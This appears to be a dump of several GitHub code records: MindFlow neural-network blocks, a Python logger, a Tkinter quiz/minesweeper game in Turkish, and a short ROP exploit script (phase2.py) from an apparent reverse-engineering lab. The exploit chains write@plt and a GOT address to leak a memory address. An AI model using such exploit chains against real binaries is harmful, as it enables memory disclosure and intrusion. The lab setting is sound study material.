Default: ``\"zeros\"``.\n has_bias (bool): Specifies whether the layer uses a bias vector. Default: ``True``.\n activation (Union[str, Cell, Primitive, None]): activate function applied to the output of the fully connected\n layer. 
Default: ``None``.\n\n Inputs:\n - **input** (Tensor) - Tensor of shape :math:`(*, in\\_channels)`.\n\n Outputs:\n Tensor of shape :math:`(*, out\\_channels)`.\n\n Supported Platforms:\n ``Ascend`` ``GPU``\n\n Examples:\n >>> import numpy as np\n >>> from mindflow.cell import LinearBlock\n >>> from mindspore import Tensor\n >>> input = Tensor(np.array([[180, 234, 154], [244, 48, 247]], np.float32))\n >>> net = LinearBlock(3, 4)\n >>> output = net(input)\n >>> print(output.shape)\n (2, 4)\n\n \"\"\"\n\n def __init__(self,\n in_channels,\n out_channels,\n weight_init='normal',\n bias_init='zeros',\n has_bias=True,\n activation=None):\n super(LinearBlock, self).__init__()\n self.activation = get_activation(activation) if isinstance(\n activation, str) else activation\n self.dense = nn.Dense(in_channels,\n out_channels,\n weight_init=weight_init,\n bias_init=bias_init,\n has_bias=has_bias,\n activation=self.activation)\n\n def construct(self, x):\n out = self.dense(x)\n return out\n\n\nclass ResBlock(nn.Cell):\n r\"\"\"\n The ResBlock of dense layer.\n\n Args:\n in_channels (int): The number of channels in the input space.\n out_channels (int): The number of channels in the output space.\n weight_init (Union[Tensor, str, Initializer, numbers.Number]): The trainable weight_init parameter. The dtype\n is same as input x. The values of str refer to the function `initializer`. Default: ``'normal'``.\n bias_init (Union[Tensor, str, Initializer, numbers.Number]): The trainable bias_init parameter. The dtype is\n same as input x. The values of str refer to the function `initializer`. Default: ``'zeros'``.\n has_bias (bool): Specifies whether the layer uses a bias vector. Default: ``True``.\n activation (Union[str, Cell, Primitive, None]): activate function applied to the output of the dense layer.\n Default: ``None``.\n weight_norm (bool): Whether to compute the sum of squares of weight. 
Default: ``False``.\n\n Inputs:\n - **input** (Tensor) - Tensor of shape :math:`(*, in\\_channels)`.\n\n Outputs:\n Tensor of shape :math:`(*, out\\_channels)`.\n\n Raises:\n ValueError: If `in_channels` not equal out_channels.\n TypeError: If `activation` is not in str or Cell or Primitive.\n\n Supported Platforms:\n ``Ascend`` ``GPU``\n\n Examples:\n >>> import numpy as np\n >>> from mindflow.cell import ResBlock\n >>> from mindspore import Tensor\n >>> input = Tensor(np.array([[180, 234, 154], [244, 48, 247]], np.float32))\n >>> net = ResBlock(3, 3)\n >>> output = net(input)\n >>> print(output.shape)\n (2, 3)\n\n \"\"\"\n\n def __init__(self,\n in_channels,\n out_channels,\n weight_init='normal',\n bias_init='zeros',\n has_bias=True,\n activation=None,\n weight_norm=False):\n super(ResBlock, self).__init__()\n check_param_type(in_channels, \"in_channels\",\n data_type=int, exclude_type=bool)\n check_param_type(out_channels, \"out_channels\",\n data_type=int, exclude_type=bool)\n if in_channels != out_channels:\n raise ValueError(\"in_channels of ResBlock should be equal of out_channels, but got in_channels: {}, \"\n \"out_channels: {}\".format(in_channels, out_channels))\n self.dense = LinearBlock(in_channels,\n out_channels,\n weight_init=weight_init,\n bias_init=bias_init,\n has_bias=has_bias,\n activation=None)\n self.activation = get_activation(activation) if isinstance(\n activation, str) else activation\n if activation is not None and not isinstance(self.activation, (nn.Cell, ops.Primitive)):\n raise TypeError(\n \"The activation must be str or Cell or Primitive,\"\" but got {}.\".format(type(activation)))\n if not activation:\n self.activation = ops.Identity()\n\n def construct(self, x):\n out = self.activation(self.dense(x) + x)\n return out\n\n\ndef _bias_init(fan_in, fan_out):\n \"\"\"initializer function for bias\"\"\"\n bound = 1 / math.sqrt(fan_in) if fan_in > 0 else 0\n out = np.random.uniform(-bound, bound, fan_out)\n return Tensor(out, mstype.float32)\n\n\nclass InputScale(nn.Cell):\n r\"\"\"\n Scale the input value to specified region based on :math:`(x_i - input_center)*input_scale`\n\n Args:\n input_scale (list): The scale factor of input.\n input_center (Union[list, None]): Position offset of coordinate translation. 
Default: ``None``.\n\n Inputs:\n - **input** (Tensor) - Tensor of shape :math:`(*, channels)`.\n\n Outputs:\n Tensor of shape :math:`(*, channels)`.\n\n Raises:\n TypeError: If `input_scale` is not a list.\n TypeError: If `input_center` is not a list or ``None``.\n\n Supported Platforms:\n ``Ascend`` ``GPU``\n\n Examples:\n >>> import numpy as np\n >>> from mindflow.cell import InputScale\n >>> from mindspore import Tensor\n >>> inputs = np.random.uniform(size=(16, 3)) + 3.0\n >>> inputs = Tensor(inputs.astype(np.float32))\n >>> input_scale = [1.0, 2.0, 4.0]\n >>> input_center = [3.5, 3.5, 3.5]\n >>> net = InputScale(input_scale, input_center)\n >>> output = net(inputs).asnumpy()\n >>> assert np.all(output[:, 0] <= 0.5) and np.all(output[:, 0] >= -0.5)\n >>> assert np.all(output[:, 1] <= 1.0) and np.all(output[:, 0] >= -1.0)\n >>> assert np.all(output[:, 2] <= 2.0) and np.all(output[:, 0] >= -2.0)\n \"\"\"\n\n def __init__(self, input_scale, input_center=None):\n super(InputScale, self).__init__()\n check_param_type(input_scale, \"input_scale\", data_type=list)\n check_param_type(input_center, \"input_center\",\n data_type=(type(None), list))\n input_scale = np.array(input_scale)\n self.input_scale = Tensor(input_scale, mstype.float32)\n if input_center is None:\n self.input_center = Tensor(\n np.zeros(input_scale.shape), mstype.float32)\n else:\n self.input_center = Tensor(np.array(input_center), mstype.float32)\n self.mul = ops.Mul()\n\n def construct(self, x):\n out = self.mul(x - self.input_center, self.input_scale)\n return out\n\n\ndef _get_out_net_activation(is_out, act):\n if is_out:\n return None\n return act\n\n\nclass FCSequential(nn.Cell):\n r\"\"\"\n A sequential container of the dense layers, dense layers are added to the container sequentially.\n\n Args:\n in_channels (int): The number of channels in the input space.\n out_channels (int): The number of channels in the output space.\n layers (int): The total number of layers, include input/hidden/output layers.\n neurons (int): The number of neurons of hidden layers.\n residual (bool): full-connected of residual block for the hidden layers. Default: ``True``.\n act (Union[str, Cell, Primitive, None]): activate function applied to the output of the fully connected layer,\n eg. ``'ReLU'``.Default: ``\"sin\"``.\n weight_init (Union[Tensor, str, Initializer, numbers.Number]): The trainable weight_init parameter. The dtype\n is same as input x. The values of str refer to the function `initializer`. Default: ``'normal'``.\n has_bias (bool): Specifies whether the layer uses a bias vector. Default: ``True``.\n bias_init (Union[Tensor, str, Initializer, numbers.Number]): The trainable bias_init parameter. The dtype\n is same as input x. The values of str refer to the function `initializer`. Default: ``'default'``.\n weight_norm (bool): Whether to compute the sum of squares of weight. 
Default: ``False``.\n\n Inputs:\n - **input** (Tensor) - Tensor of shape :math:`(*, in\\_channels)`.\n\n Outputs:\n Tensor of shape :math:`(*, out\\_channels)`.\n\n Raises:\n TypeError: If `layers` is not an int.\n TypeError: If `neurons` is not an int.\n TypeError: If `residual` is not a bool.\n ValueError: If `layers` is less than 3.\n\n Supported Platforms:\n ``Ascend`` ``GPU``\n\n Examples:\n >>> import numpy as np\n >>> from mindflow.cell import FCSequential\n >>> from mindspore import Tensor\n >>> inputs = np.ones((16, 3))\n >>> inputs = Tensor(inputs.astype(np.float32))\n >>> net = FCSequential(3, 3, 5, 32, weight_init=\"ones\", bias_init=\"zeros\")\n >>> output = net(inputs).asnumpy()\n >>> print(output.shape)\n (16, 3)\n \"\"\"\n\n def __init__(self,\n in_channels,\n out_channels,\n layers,\n neurons,\n residual=True,\n act=\"sin\",\n weight_init='normal',\n has_bias=True,\n bias_init='default',\n weight_norm=False):\n super(FCSequential, self).__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.layers = layers\n self.neurons = neurons\n self.residual = residual\n self.act = act\n self.weight_init = weight_init\n self.has_bias = has_bias\n self.bias_init = bias_init\n self.weight_norm = weight_norm\n\n self._check_params()\n self.network = nn.SequentialCell()\n self._create_networks()\n\n def construct(self, x):\n return self.network(x)\n\n def _create_networks(self):\n self._add_linear_block(\n self.in_channels, self.neurons, weight_init=self.weight_init)\n self._add_hidden_blocks(\n self.neurons, self.neurons, weight_init=self.weight_init)\n self._add_linear_block(\n self.neurons, self.out_channels, weight_init=self.weight_init, is_out_net=True)\n\n def _check_params(self):\n check_param_type(self.layers, \"layers\",\n data_type=int, exclude_type=bool)\n check_param_type(self.neurons, \"neurons\",\n data_type=int, exclude_type=bool)\n check_param_type(self.residual, \"residual\", data_type=bool)\n if self.layers < 3:\n raise ValueError(\n \"FCSequential must have at least 3 layers, but got layers: {}\".format(self.layers))\n\n def _add_linear_block(self, in_channels, out_channels, weight_init, is_out_net=False):\n act = _get_out_net_activation(is_out_net, self.act)\n self.network.append(LinearBlock(in_channels,\n out_channels,\n activation=act,\n weight_init=weight_init,\n has_bias=self.has_bias,\n bias_init=_bias_init(\n in_channels, out_channels)\n if self.bias_init == \"default\" else self.bias_init,\n ))\n\n def _add_res_block(self, in_channels, out_channels, weight_init, is_out_net=False):\n act = _get_out_net_activation(is_out_net, self.act)\n self.network.append(ResBlock(in_channels,\n out_channels,\n activation=act,\n weight_init=weight_init,\n has_bias=self.has_bias,\n bias_init=_bias_init(\n in_channels, out_channels)\n if self.bias_init == \"default\" else self.bias_init,\n ))\n\n def _add_hidden_blocks(self, in_channels, out_channels, weight_init):\n for _ in range(self.layers - 2):\n if self.residual:\n self._add_res_block(in_channels, out_channels, weight_init)\n else:\n self._add_linear_block(in_channels, out_channels, weight_init)\n\n\nclass MultiScaleFCSequential(nn.Cell):\n r\"\"\"\n The multi-scale fully connected network.\n\n Args:\n in_channels (int): The number of channels in the input space.\n out_channels (int): The number of channels in the output space.\n layers (int): The total number of layers, including input/hidden/output layers.\n neurons (int): The number of neurons of hidden layers.\n residual (bool): whether to use fully-connected 
residual blocks for the hidden layers. Default: ``True``.\n act (Union[str, Cell, Primitive, None]): activation function applied to the output of the fully connected layer,\n e.g. ``'ReLU'``. Default: ``\"sin\"``.\n weight_init (Union[Tensor, str, Initializer, numbers.Number]): The trainable weight_init parameter. The dtype\n is same as `input`. The values of str refer to the function `initializer`. Default: ``'normal'``.\n weight_norm (bool): Whether to compute the sum of squares of weight. Default: ``False``.\n has_bias (bool): Specifies whether the layer uses a bias vector. Default: ``True``.\n bias_init (Union[Tensor, str, Initializer, numbers.Number]): The trainable bias_init parameter. The dtype\n is same as `input`. The values of str refer to the function `initializer`. Default: ``'default'``.\n num_scales (int): The number of subnets of the multi-scale network. Default: ``4``.\n amp_factor (Union[int, float]): The amplification factor of input. Default: ``1.0``.\n scale_factor (Union[int, float]): The base scale factor. Default: ``2.0``.\n input_scale (Union[list, None]): The scale factor of input x/y/t. If not ``None``, the inputs will be\n scaled before set in the network. Default: ``None``.\n input_center (Union[list, None]): Center position of coordinate translation. If not ``None``, the inputs will be\n translated before set in the network. Default: ``None``.\n latent_vector (Union[Parameter, None]): Trainable parameter which will be concatenated with the sampling inputs\n and updated during training. Default: ``None``.\n\n Inputs:\n - **input** (Tensor) - Tensor of shape :math:`(*, in\\_channels)`.\n\n Outputs:\n Tensor of shape :math:`(*, out\\_channels)`.\n\n Raises:\n TypeError: If `num_scales` is not an int.\n TypeError: If `amp_factor` is neither int nor float.\n TypeError: If `scale_factor` is neither int nor float.\n TypeError: If `latent_vector` is neither a Parameter nor ``None``.\n\n Supported Platforms:\n ``Ascend`` ``GPU``\n\n Examples:\n >>> import numpy as np\n >>> from mindflow.cell import MultiScaleFCSequential\n >>> from mindspore import Tensor, Parameter\n >>> inputs = np.ones((64,3)) + 3.0\n >>> inputs = Tensor(inputs.astype(np.float32))\n >>> num_scenarios = 4\n >>> latent_size = 16\n >>> latent_init = np.ones((num_scenarios, latent_size)).astype(np.float32)\n >>> latent_vector = Parameter(Tensor(latent_init), requires_grad=True)\n >>> input_scale = [1.0, 2.0, 4.0]\n >>> input_center = [3.5, 3.5, 3.5]\n >>> net = MultiScaleFCSequential(3, 3, 5, 32,\n ... weight_init=\"ones\", bias_init=\"zeros\",\n ... 
input_scale=input_scale, input_center=input_center, latent_vector=latent_vector)\n >>> output = net(inputs).asnumpy()\n >>> print(output.shape)\n (64, 3)\n \"\"\"\n\n def __init__(self,\n in_channels,\n out_channels,\n layers,\n neurons,\n residual=True,\n act=\"sin\",\n weight_init='normal',\n weight_norm=False,\n has_bias=True,\n bias_init=\"default\",\n num_scales=4,\n amp_factor=1.0,\n scale_factor=2.0,\n input_scale=None,\n input_center=None,\n latent_vector=None\n ):\n super(MultiScaleFCSequential, self).__init__()\n check_param_type(num_scales, \"num_scales\",\n data_type=int, exclude_type=bool)\n check_param_type(amp_factor, \"amp_factor\",\n data_type=(int, float), exclude_type=bool)\n check_param_type(scale_factor, \"scale_factor\",\n data_type=(int, float), exclude_type=bool)\n\n self.cell_list = nn.CellList()\n self.num_scales = num_scales\n self.scale_coef = [amp_factor * (scale_factor**i)\n for i in range(self.num_scales)]\n\n self.latent_vector = latent_vector\n if self.latent_vector is not None:\n check_param_type(latent_vector, \"latent_vector\",\n data_type=Parameter)\n self.num_scenarios = latent_vector.shape[0]\n self.latent_size = latent_vector.shape[1]\n in_channels += self.latent_size\n else:\n self.num_scenarios = 1\n self.latent_size = 0\n\n for _ in range(self.num_scales):\n self.cell_list.append(FCSequential(in_channels=in_channels,\n out_channels=out_channels,\n layers=layers,\n neurons=neurons,\n residual=residual,\n act=act,\n weight_init=weight_init,\n has_bias=has_bias,\n bias_init=bias_init,\n ))\n if input_scale is not None:\n self.input_scale = InputScale(input_scale, input_center)\n else:\n self.input_scale = ops.Identity()\n\n self.cast = ops.Cast()\n self.concat = ops.Concat(axis=1)\n\n def construct(self, x):\n x = self.input_scale(x)\n if self.latent_vector is not None:\n batch_size = x.shape[0]\n latent_vectors = self.latent_vector.view(self.num_scenarios, 1,\n self.latent_size).repeat(\n batch_size // self.num_scenarios,\n axis=1).view((-1, self.latent_size))\n x = self.concat((x, latent_vectors))\n out = 0\n for i in range(self.num_scales):\n x_s = x * self.scale_coef[i]\n out = out + self.cast(self.cell_list[i](x_s), mstype.float32)\n return out\n","repo_name":"mindspore-ai/mindscience","sub_path":"MindFlow/mindflow/cell/basic_block.py","file_name":"basic_block.py","file_ext":"py","file_size_in_byte":20997,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"95"} +{"seq_id":"74423879991","text":"# -*- coding: utf8\nimport os\nimport sys\n\nimport logging\n\nimport datetime\n\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n# 2017/3/27 15:50\n__author__ = 'haizhu'\n\n\nclass Logger:\n def __init__(self, log_dir=\"/data/log/jiemo-postPV\"):\n self._logDir = log_dir\n if not os.path.exists(log_dir):\n os.makedirs(log_dir)\n logging.basicConfig(\n filename=os.path.join(log_dir, \"main.log_{0}\".format((datetime.datetime.now()).strftime(\"%Y-%m-%d\"))),\n level=logging.INFO,\n format='[%(asctime)s %(levelname)s %(process)d %(filename)s %(lineno)d] - %(message)s')\n\n # 初始化暑促\n logger = logging.getLogger(\"markdown\")\n logger.setLevel(logging.INFO)\n\n file = os.path.join(self._logDir, \"score.md\");\n\n if os.path.exists(file):\n os.remove(file)\n\n fh = logging.FileHandler(file)\n fh.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(message)s')\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n 
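# A minimal usage sketch for the Logger above, assuming the file is importable
# as Jiemo_logger (the file_name given for this record); the log_dir value is
# a hypothetical example, not the project's default path.
from Jiemo_logger import Logger
import logging

Logger(log_dir="/tmp/jiemo-postPV")  # configures main.log_<date> plus the markdown handler
logging.getLogger("markdown").info("# score report")  # written to score.md as a bare message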
pass\n","repo_name":"hai046/postPV","sub_path":"Jiemo_logger.py","file_name":"Jiemo_logger.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"6156947258","text":"from helper import *\nfrom time import sleep\n\nwrite_plt = hex2le(\"08048290\")\nwrite_got = hex2le(\"08049434\")\n\nquit_plt = hex2le(\"080482b0\")\n\nwelcome = \"Bye!\\n\\n\"\n\ndef main():\n log(read_all(sys.stdin))\n\n exploit = 20 * \"B\" + \\\n write_plt + \\\n quit_plt + \\\n write_got\n\n write_bytes(int2le(len(exploit)))\n write_bytes(exploit)\n response = read_all(sys.stdin)\n if not response.startswith(welcome):\n log(\"Something wrong...\")\n log(le2hex(response[len(welcome):len(welcome)+4]))\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"pulver22/ReversingEngineering","sub_path":"rop/exploit/phase2.py","file_name":"phase2.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"42433593100","text":"import random as rnd\nimport time\nimport os\nimport tkinter as tk\nimport subprocess as sp\nimport platform as plt\n\n#Kullanılacak yazı tipleri için makro tanımlar.\nTIP = (\"Verdana\", 12)\nTIP_1 = (\"Helvetica\", 24)\nK_TIP_1 = (\"Helvetica\", 12)\nYOL = \".{}harici_dosyalar\".format(os.sep)\nYOL_1 = \".{}harici_dosyalar{}mayın_soruları\".format(os.sep, os.sep)\nYOL_2 = \".{}harici_dosyalar{}bonus_soruları\".format(os.sep, os.sep)\nYOL_3 = \".{}harici_dosyalar{}kullanıcı_dosyaları\".format(os.sep, os.sep)\nYOL_4 = \".{}görseller\".format(os.sep)\n\nclass PythonBebegim(tk.Tk):\n \"Mayınlardan python ile kurtulun.\"\n def __init__(self, *args, **kwargs):\n \"\"\"Kontrol sınıfının yapılandırıcı fonksiyonudur.\nKontrol sınıfımızın üst sınıfının yapılandırıcı fonksiyonunun\nözelliklerini super fonksiyonuyla alır.Ayrıca\noyunun diğer sayfalarını içerisinde barındıracak taşıyıcı sayfayı\ntanımlar.Oyundaki tüm sayfalarının sınıfları örnekleyerek bir\nsözlük içine koyar ve yeri geldiğinde bu sayfaların gösterilmesini\nsağlar\"\"\"\n super().__init__(*args, **kwargs)\n #Oyunun pencere başlığı\n tk.Tk.wm_title(self, \"Mayın Tarlası\")\n #Sayfa boyutu sabitlenir ve boyutlandırılır.\n self.resizable(width=False, height=False)\n self.geometry('{}x{}'.format(372, 400))\n \n #Tüm sayfaları barındıracak ana sayfa.\n self.tasiyici = tk.Frame(self)\n self.tasiyici.pack()\n \n #programın kullanacağı ek dosya ve klasörleri denetler.\n #yoksa oluşturur, varsa işleme devam eder.\n Islemler.kaynak_denetimi()\n \n #Oyundaki tüm sayfaların örneklerinin bulunduğu sözlük.\n #Bu sözlükte tüm sayfaların sınıfları örneklenmiştir ve\n #kullanılmaya hazırdır.cerceve_goster fonksiyonu ile\n #gereken zamanda sayfalar gösterilir.\n self.cerceveler = {}\n for sayfa in [\"AnaSayfa\", \"Oyun\", \"YuksekSkorlar\", \"Ogretici\"]:\n sınıf_adı = eval(sayfa)\n self.cerceveler[sayfa] = sınıf_adı(self.tasiyici, self)\n self.cerceveler[sayfa].grid(row=0, column=0, sticky=\"nsew\")\n #başlangıçta anasayfayı gösterir.\n self.cerceve_goster(\"AnaSayfa\")\n \n def cerceve_goster(self, sayfa_adı):\n \"\"\"sayfa adlarını parametle olarak alır.Bu sayfa adını\nkullanarak, sayfalarının örneklerinin bulunduğu sözlükten sayfayı\nbulur.Daha sonra tk.raise metodu ile bu sayfayı ekranda gösterir.\"\"\"\n self.cerceve = self.cerceveler[sayfa_adı]\n self.cerceve.tkraise()\n \n def sayfa_yenile(self, sayfa_listesi):\n \"\"\"yenilecek sayfaların adını bir liste içinde 
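# Hedged sketch of the page-switch pattern used by cerceve_goster above:
# all page frames share one grid cell, and tkraise() lifts the active one.
import tkinter as tk

root = tk.Tk()
pages = {}
for name in ("home", "game"):
    frame = tk.Frame(root)
    tk.Label(frame, text=name).pack()
    frame.grid(row=0, column=0, sticky="nsew")  # every page occupies the same cell
    pages[name] = frame
pages["home"].tkraise()  # the equivalent of cerceve_goster("home")
root.mainloop()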
alır\n ve bu sayfaları yeniden oluşturulur.Böylece sayfa içinde olan\n değişiklikler ekrana yansır.\"\"\"\n for sayfa in sayfa_listesi:\n sınıf_adı = eval(sayfa)\n self.cerceveler[sayfa] = sınıf_adı(self.tasiyici, self)\n self.cerceveler[sayfa].grid(row=0, column=0, sticky=\"nsew\")\n \n \n \n \nclass AnaSayfa(tk.Frame):\n def __init__(self, tasiyici, kontrolcu):\n \"\"\"Anasayfa sınıfıdır.Programın sayfalarına\nerişmek için gerekli butonları içerir.\"\"\"\n #Frame sınıfının niteliklerini super fonksiyonu ile alır.\n #tasiyici bu çerçeveyi taşıyan kök penceredir.\n super().__init__(tasiyici)\n #Oyun başlığıdır.\n self.baslik_etiketi = tk.Label(self, text=\"Mayın Tarlası\",\n relief=tk.GROOVE, borderwidth=5,\n width=20, fg=\"black\", bg=\"gray\",\n font=TIP_1)\n self.baslik_etiketi.grid(row=0, column=0, columnspan=3)\n #Oyun penceresine geçiş butonudur.\n self.buton = tk.Button(self, text=\"Oyun\", relief=tk.RAISED,\n borderwidth=2, width=20, font=K_TIP_1,\n command=\n lambda: kontrolcu.cerceve_goster(\"Oyun\"))\n self.buton.grid(row=1, column=1)\n #Öğretici penceresine geçiş butonudur.\n self.buton1 = tk.Button(self, text=\"Öğretici\", relief=tk.RAISED,\n borderwidth=2, width=20, font=K_TIP_1,\n command=\n lambda: kontrolcu.cerceve_goster(\"Ogretici\"))\n self.buton1.grid(row=2, column=1)\n #Yüksek skorlar penceresine geçiş butonudur.\n self.buton2 = tk.Button(self, text=\"Yüksek Skorlar\",\n relief=tk.RAISED, borderwidth=2,\n width=20, font=K_TIP_1, command=lambda:\n kontrolcu.cerceve_goster(\"YuksekSkorlar\"))\n self.buton2.grid(row=3, column=1)\n \n \nclass Oyun(tk.Frame):\n \"\"\"Oyunun yaratıldığı sınıftır.\"\"\"\n def __init__(self, tasiyici, kontrolcu):\n super().__init__(tasiyici)\n \n self.kontrolcu = kontrolcu\n \n self.harita = Islemler.son_haritayi_bul()\n self.buton_sayisi = Islemler.satir_sutun(self.harita)\n self.buton_takibi()#buton sayisini kontrol eder.\n\n self.puan_etiketi = tk.Label(self, text= \"0\", font=TIP_1)\n self.puan_etiketi.grid(row=0, column=0, columnspan=3)\n \n self.tarla_tasiyici = tk.Frame(self, padx=10, pady=10)\n self.tarla_tasiyici.grid(row=1, column=0, columnspan=3)\n \n for r in range(len(self.harita)):\n for c in range(self.buton_sayisi // len(self.harita)):\n if self.harita[r][c] == 'x':\n bos_buton = tk.Button(self.tarla_tasiyici, \n relief=tk.RAISED, width=2,\n borderwidth=2)\n bos_buton[\"command\"] = (lambda buton=bos_buton : \n self.bos_butonlar(buton))\n bos_buton.grid(row=r, column=c)\n elif self.harita[r][c] == '?':\n soru_buton = tk.Button(self.tarla_tasiyici, \n relief=tk.RAISED, width=2,\n borderwidth=2)\n soru_buton[\"command\"] = (lambda buton=soru_buton :\n self.soru_butonu(buton))\n \n soru_buton.grid(row=r, column=c)\n elif self.harita[r][c] == 'b':\n bonus_buton = tk.Button(self.tarla_tasiyici,\n relief=tk.RAISED, width=2,\n borderwidth=2)\n bonus_buton[\"command\"] = (lambda buton=bonus_buton :\n self.bonus_butonu(buton))\n bonus_buton.grid(row=r, column=c)\n \n self.donus_butonu = tk.Button(self, text='Ana Sayfa',\n relief=tk.RAISED, width=10,\n borderwidth=2,\n command=self.sayfa_gecisi)\n self.donus_butonu.grid(row=2, column= 0)\n \n self.yenile_butonu = tk.Button(self, text=\"Oyunu Yenile\", \n relief=tk.RAISED, width=10, \n borderwidth=2, \n command=lambda: \n self.kontrolcu.sayfa_yenile(['Oyun']),\n state=tk.DISABLED)\n self.yenile_butonu.grid(row=2, column=2)\n \n \n \n def soru_butonu(self, buton):\n \"\"\"Bir Toplevel sayfası oluşturur ve\nsoru ile tamamlanacak betiği gösterir.60 saniye açık kalır.\nSoru cevaplanmadan 
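# The button loop above depends on binding the loop variable as a default
# argument (buton=bos_buton); a plain late-binding lambda would make every
# command see only the last button. A minimal demonstration of the difference:
late = [lambda: i for i in range(3)]
bound = [lambda i=i: i for i in range(3)]
assert [f() for f in late] == [2, 2, 2]    # all closures share the final i
assert [f() for f in bound] == [0, 1, 2]   # defaults capture i per iteration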
sayfa kapatılırsa, oyunu sıfırlar.\"\"\"\n buton['state'] = tk.DISABLED\n buton['text'] = '?'\n soru = SoruToplevel(self, self.kontrolcu)\n self.buton_sayisi -= 1\n\n \n def bonus_butonu(self, buton):\n buton['state'] = tk.DISABLED\n buton['text'] = 'B'\n self.buton_sayisi -= 1\n \n def bos_butonlar(self, buton):\n buton['state'] = tk.DISABLED\n buton['text'] = 'X'\n self.puan_etiketi[\"text\"] = str(eval(\n self.puan_etiketi[\"text\"]) + 1)\n \n self.buton_sayisi -= 1\n \n def sayfa_gecisi(self):\n self.kontrolcu.sayfa_yenile(['Oyun'])\n self.kontrolcu.cerceve_goster('AnaSayfa')\n \n def buton_takibi(self):\n \"\"\"Aktif buton sayısını kontrol eder.\nEğer aktif buton sayısı 0'a indiyse oyunu yeniler.\"\"\"\n if self.buton_sayisi <= 0:\n self.yenile_butonu.config(state=\"normal\")\n else:\n #Her program döngüsünde 1000 kere çalıştır.\n self.after(1000,self.buton_takibi)\n \n\nclass Ogretici(tk.Frame):\n def __init__(self, parent, controller):\n super().__init__(parent)\n \nclass YuksekSkorlar(tk.Frame):\n def __init__(self, parent, controller):\n super().__init__(parent)\n\nclass Islemler:\n \"\"\"Oyunun altyapıyı ilgilendiren arayüzle bağlantılı,\nolmayan işlerini yapan fonksiyonları bulunduran sınıftır.\"\"\"\n def __init__(self):\n \"\"\"boş başlatıcı fonksiyon.Sınıfımızdaki metodları örneklemeden\nkullanabiliyoruz.Bu yüzden başlatıcı fonksiyonumuz boş.\"\"\"\n pass\n \n @classmethod\n def harita_yarat(cls, boyutlar=(8,8), esya_listesi=['x', 'b', '?']):\n \"\"\"Verilen boyutlarda, item listesindeki elemanlar ile\n2 boyutlu harita oluşturur.Elemanların bulunma sıklığı, esya\nlistesindeki elemanların sırasına göre azalır.\"\"\"\n eksen_x, eksen_y = boyutlar#eksen boyutları değişkene atanır.\n harita = []\n for satir in range(eksen_x):\n bir_satir = []\n for sutun in range(eksen_y):\n random_sayi = rnd.randint(0, 100)#random sayı tutulur.\n if random_sayi == 0 or random_sayi == 100:\n #random sayı 0 veya 100 ise\n bir_satir.append(esya_listesi[-1])\n elif random_sayi > 10 and random_sayi < 90:\n #random sayı 10 ile 80 arasında ise\n bir_satir.append(esya_listesi[0])\n else:\n try:\n #esya listesi 2 elemanlı olarak verilirse\n #oluşacak hata önlenir.\n bir_satir.append(rnd.choice(esya_listesi[1:-1]))\n except IndexError:\n bir_satir.append(esya_listesi[-1])\n harita.append(bir_satir)\n \n return harita\n \n @classmethod\n def harita_kontrolu(cls, harita, esya_listesi=['x', 'b', '?']):\n \"\"\"Parametre olarak verilen harita ve esya_listesi ile\nbir harita skoru oluşturur.Böylece daha fazla çeşitte eşya\niçeren harita daha yüksek skora sahip olur.\"\"\"\n skor = 0\n for satir in harita:\n for sutun in satir:\n if sutun == esya_listesi[0]:\n skor += 1\n elif sutun in esya_listesi[1:-1]:\n skor += 4\n elif sutun == esya_listesi[-1]:\n skor += 40\n return skor\n \n @classmethod\n def son_haritayi_bul(cls, sayac = 5):\n \"\"\"Parametre olarak verilen kere harita_olustur\nfonksiyonuyla harita oluşturur ve skorunu bulur.En yüksek skora sahip\nharitayı son harita olarak döndürür.\"\"\"\n son_skor = 0\n son_harita = None\n for i in range(sayac):\n harita = cls.harita_yarat()\n ara_skor = cls.harita_kontrolu(harita)\n if ara_skor > son_skor:\n son_skor = ara_skor\n son_harita = harita\n \n return son_harita\n \n @classmethod\n def betik_islet(cls, komut_listesi):\n \"\"\"komut listesindeki komutlar ile Popen nesnesi\n oluşturur.Komut listesinin çıktılarını ve hatalarını, Popen\n nesnesinin communicate komutuyla yakalar ve çıktı değeri\n olarak döndürür.Bu fonksiyon kullanıcının yazdığı kodları\n bir 
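# betik_islet (described above) could equivalently be written with
# subprocess.run, which handles the timeout/kill dance internally; this is a
# sketch of that alternative, not the project's actual implementation.
import subprocess as sp

def run_script(cmd):
    try:
        done = sp.run(cmd, capture_output=True, timeout=15)
    except sp.TimeoutExpired as exc:
        return (exc.stdout or b"").decode("utf-8"), "timeout"
    return done.stdout.decode("utf-8"), done.stderr.decode("utf-8")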
python dosyasına kaydetmek ve bunu yürüterek\n çıktısını bulmak içindir.\"\"\"\n surec = sp.Popen(komut_listesi, stdout=sp.PIPE, stderr=sp.PIPE)\n try:\n #popen nesnesi ile bağlantı kurulur ve\n #girilen komutun çıktısı ile verdiği hata\n #bir değişkende tutulur.\n cikti, hata = surec.communicate(timeout=15)\n except sp.TimeoutExpired:\n surec.kill()\n cikti, hata = surec.communicate()\n #popen nesnesi çıktılar ve hataları byte olarak döndürür.\n #byte'ları utf-8 karakter kodlama sistemine çevirerek\n #anlaşılır çıktılar elde ederiz.\n return cikti.decode(\"utf-8\"), hata.decode(\"utf-8\")\n \n @classmethod\n def yorumlayici_bul(cls):\n \"\"\"sistem adı platform kütüphanesi system fonksiyonu ile\nbulunur.Eğer sistem adı linux ise python 3x yorumlayıcısı nasıl\nadlandırılmış o bulunur.bu yorumlayıcı adı olarak ilerde\nbetik çalıştırmak için tutulur.Eğer sistem windows ise\npython yorumlayıcısı python.exe olarak tutulur.\"\"\"\n sistem_adi = plt.system()#sistem adı bul.\n yorumlayici = None\n if sistem_adi == \"Linux\":\n cikti, hata = cls.betik_islet([\"python3\", \"-V\"])\n if hata == '':#python3 komutu hata yaratmıyorsa\n yorumlayici = \"python3\"\n else:\n #python3 komutu hata yaratıyorsa python3\n #python komutu ile çağrılıyordur.\n yorumlayici = \"python\"\n elif sistem_adi == \"Windows\":\n yorumlayici = \"python.exe\"\n \n return yorumlayici\n \n 